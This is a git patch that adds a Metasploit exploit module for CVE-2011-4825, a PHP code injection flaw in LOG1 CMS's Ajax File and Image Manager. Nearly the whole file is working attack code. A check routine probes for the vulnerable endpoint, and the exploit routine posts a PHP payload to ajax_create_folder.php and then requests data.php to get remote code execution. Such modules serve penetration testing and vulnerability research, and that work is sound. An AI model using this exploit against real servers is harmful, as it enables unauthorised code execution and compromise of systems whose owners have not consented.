From 7fd3644b8b6ae8ded24ec2cbbce930a7082b3307 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Fri, 1 Jun 2012 18:45:44 -0500
Subject: [PATCH] Add CVE-2011-4825 module

---
 .../multi/http/logcms_ajax_create_folder.rb   | 102 ++++++++++++++++++
 1 file changed, 102 insertions(+)
 create mode 100644 modules/exploits/multi/http/logcms_ajax_create_folder.rb

diff --git a/modules/exploits/multi/http/logcms_ajax_create_folder.rb b/modules/exploits/multi/http/logcms_ajax_create_folder.rb
new file mode 100644
index 0000000000..7b15af47b6
--- /dev/null
+++ b/modules/exploits/multi/http/logcms_ajax_create_folder.rb
@@ -0,0 +1,102 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "LOG1 CMS writeInfo() PHP Code Injection",
+			'Description'    => %q{
+					This module exploits the "Ajax File and Image Manager" component that can be
+				found in LOG1 CMS.  In function.base.php of this component, the 'data' parameter
+				in writeInfo() allows any malicious user to have direct control of writing data
+				to file data.php, which results in arbitrary remote code execution.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'EgiX',     #Found the bug in ajax_create_folder.php
+					'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php
+					'sinn3r'    #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2011-4825'],
+					['OSVDB', '76928'],
+					['EDB', '18075'],  #Egix's adisory
+					['EDB', '18151']   #Adel's
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions'  =>
+				{
+					'ExitFunction' => "none"
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        =>
+				[
+					['LOG1 CMS 2.0', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Apr 11 2011",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The base path to LOG1CMS', '/log1cms2.0/'])
+			], self.class)
+	end
+
+
+	def check
+		uri = target_uri.path
+		uri << '/' if uri[-1, 1] != '/'
+
+		res = send_request_raw({
+			'method' => 'GET',
+			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
+		})
+
+		if res and res.code == 200
+			return Exploit::CheckCode::Detected
+		else
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+
+	def exploit
+		uri = target_uri.path
+		uri << '/' if uri[-1, 1] != '/'
+
+		peer = "#{rhost}:#{rport}"
+		php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|
+
+		print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
+		send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
+			'data'   => php
+		})
+
+		print_status("#{peer} - Requesting data.php")
+		send_request_raw({
+			'method' => 'GET',
+			'uri'    => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
+		})
+
+		handler
+	end
+end
\ No newline at end of file